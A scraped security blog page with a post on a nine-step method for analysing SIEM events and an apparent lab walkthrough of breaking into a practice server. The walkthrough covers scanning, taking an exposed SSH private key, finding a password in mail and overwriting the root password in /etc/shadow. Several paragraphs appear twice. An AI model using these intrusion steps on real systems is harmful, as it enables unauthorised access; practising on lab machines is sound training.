Some great advice from John Woods about managing an infosec team
Wednesday, December 19, 2012
Friday, October 26, 2012
The Analytical Process
Maybe I watched too many episodes of Sherlock on the BBC or really am too left brained for my own good. But, I wanted to create a post that served as a quick visual and written overview of how to analyze security events. The steps can be applied to just about anything, from fixing a problem on your car to investigating a murder. The steps are based loosely on Sniper Forensics by Chris Pogue
The 4 principles of analysis, based on the Alexiou Principle
- What question are you trying to answer?
- What data do you need to answer that question?
- Where do you go for the data?
- What does the data tell you?
“When selecting a hypothesis, the one that makes the fewest number of new assumptions is more likely to be correct.” - Occam’s Razor
9 steps for analyzing events
- Define normal
- Recognize abnormal
- Question
- Study the attacker
- Study the target
- Analyze the data
- Discard the irrelevant data
- Apply logic
- Provide analysis
The 9 steps in detail
1. Define Normal
Determine what normal messages, events and alerts look like in the SIEM.
2. Recognize Abnormal
Once you can recognize normal traffic, you can filter it out. Anything left over is abnormal and is worth investigating.
3. Question
What event or message are you seeing? Why is it abnormal? Who is the attacker? Who is the target? When did it occur?
4. Study the Attacker
Who is the attacker? What information can we find out about them? What are they doing?
5. Study the Target
Is the target system compromised? Is it behaving suspiciously? Is there any abnormal traffic originating from it? What OS and applications are running?
6. Analyze Data
What do our logs and packet captures show? What was found online? What vulnerability were they attempting to exploit?
7. Discard Irrelevant Data
What's not needed? Get rid of useless facts and noise.
8. Apply Logic
What does our data tell us? Allow the data to form the hypothesis; don’t disregard the data for an assumption.
9. Provide Analysis
What did the data show? Was there an event or a false positive? Form your analysis with as many facts as possible.
Thursday, April 7, 2011
Step 5 - Escalation
Now that were on our target we need to escalate to root privileges. First step was to edit that shadow file
Now you can run John against the hash or we could just copy pirrips and overwrite the root password, which is what I did in this example
Lets see if it works
Now you can run John against the hash or we could just copy pirrips and overwrite the root password, which is what I did in this example
Lets see if it works
Step 4 - Penetration
We successfully logged in using pirrips private/public rsa keys. Lets take a look at the /etc/passwd file for fun
Notice that Pirrip is in a different group from magwitch and havisham. From here I was stuck for a little while. I tried unsuccessfully to download the /etc/shadow file using ssh.
So I decided to start looking around the box and see if there are any interesting directories or files. I ended up looking at the /var/mail directory
Hmm email. Maybe theres some good stuff in there...
Hey check that out, theres pirrips password!
Notice that Pirrip is in a different group from magwitch and havisham. From here I was stuck for a little while. I tried unsuccessfully to download the /etc/shadow file using ssh.
So I decided to start looking around the box and see if there are any interesting directories or files. I ended up looking at the /var/mail directory
Hmm email. Maybe theres some good stuff in there...
Hey check that out, theres pirrips password!
Step 3 - Enumeration continued
I didnt know you had to manually do this but Nikto wouldnt scan the users directories on its own, I had to manually specify this using the -r switch
Nothing too interesting right there, lets move onto the next user
Look at that! Pirrip has the .ssh directory available. Lets browse to it and see what's there.
Wow, we can download the users private and public keys. Remember our Nmap results from earlier? The server is running OpenSSH which uses RSA for cryptography. RSA uses 2 keys a public and private key. If an attacker gets a hold of your private key it is very very bad. They can assume your identity and login without needing to supply your password. Lets grab those RSA keys.
I downloaded both keys and put them in my home /.ssh directory We need to chmod the files so they have the correct permissions
Now lets try to login using pirrips keys
Nothing too interesting right there, lets move onto the next user
Look at that! Pirrip has the .ssh directory available. Lets browse to it and see what's there.
Wow, we can download the users private and public keys. Remember our Nmap results from earlier? The server is running OpenSSH which uses RSA for cryptography. RSA uses 2 keys a public and private key. If an attacker gets a hold of your private key it is very very bad. They can assume your identity and login without needing to supply your password. Lets grab those RSA keys.
I downloaded both keys and put them in my home /.ssh directory We need to chmod the files so they have the correct permissions
Now lets try to login using pirrips keys
Step 3 - Enumeration
Now that we know there are some web servers running and other services lets see what we can find out about them.
We can use wget to download that page to our box so we can extract some of those email addresses.
Lets cut that file so we only show user id's
Great! Now we have user ID's we can test with. I also ran Nikto against this host to see what we could find out.
Nikto shows that this server might be susceptible to directory indexing. I used Dirbuster to see what I could find out.
Dirbuster didn't return anything interesting when I scanned the .100 target. But look what it showed on the .101 box
It looks like our UserID list we made earlier wasn't entirely accurate. I edited it down to only inlcude the names found in the dirbuster report - pirrip, havisham, magwitch
I tried browsing the ~pirrip directory on the web server but there were no files found
We can use wget to download that page to our box so we can extract some of those email addresses.
Lets cut that file so we only show user id's
Great! Now we have user ID's we can test with. I also ran Nikto against this host to see what we could find out.
Nikto shows that this server might be susceptible to directory indexing. I used Dirbuster to see what I could find out.
Dirbuster didn't return anything interesting when I scanned the .100 target. But look what it showed on the .101 box
It looks like our UserID list we made earlier wasn't entirely accurate. I edited it down to only inlcude the names found in the dirbuster report - pirrip, havisham, magwitch
I tried browsing the ~pirrip directory on the web server but there were no files found
Step 2 - Scanning
Lets take a closer look at the .100 and the .101 boxes
I forgot to take a screen capture of the .101 box but it was running apache on port 80
I forgot to take a screen capture of the .101 box but it was running apache on port 80
Subscribe to:
Posts (Atom)